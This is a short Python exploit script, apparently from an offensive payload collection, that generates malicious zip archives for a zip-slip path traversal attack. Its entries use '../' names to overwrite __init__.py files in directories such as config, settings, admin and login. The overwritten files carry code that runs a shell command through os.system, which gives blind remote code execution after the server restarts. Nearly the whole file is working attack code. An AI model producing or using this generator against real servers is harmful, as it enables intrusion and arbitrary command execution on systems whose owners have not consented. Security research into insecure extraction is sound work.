# Generating "evil" zip file # Based on the work of Ajin Abraham # Vuln website : https://github.com/ajinabraham/bad_python_extract # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution # Warning 1: need a restart from the server OR debug=True # Warning 2: you won't get the output of the command (blind rce) import zipfile directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"] for d in directories: name = "python-"+d+"-__init__.py.zip" zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED) zipf.close() z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py") z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+ z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');") z_info.external_attr = 0777 << 16L z_file.close()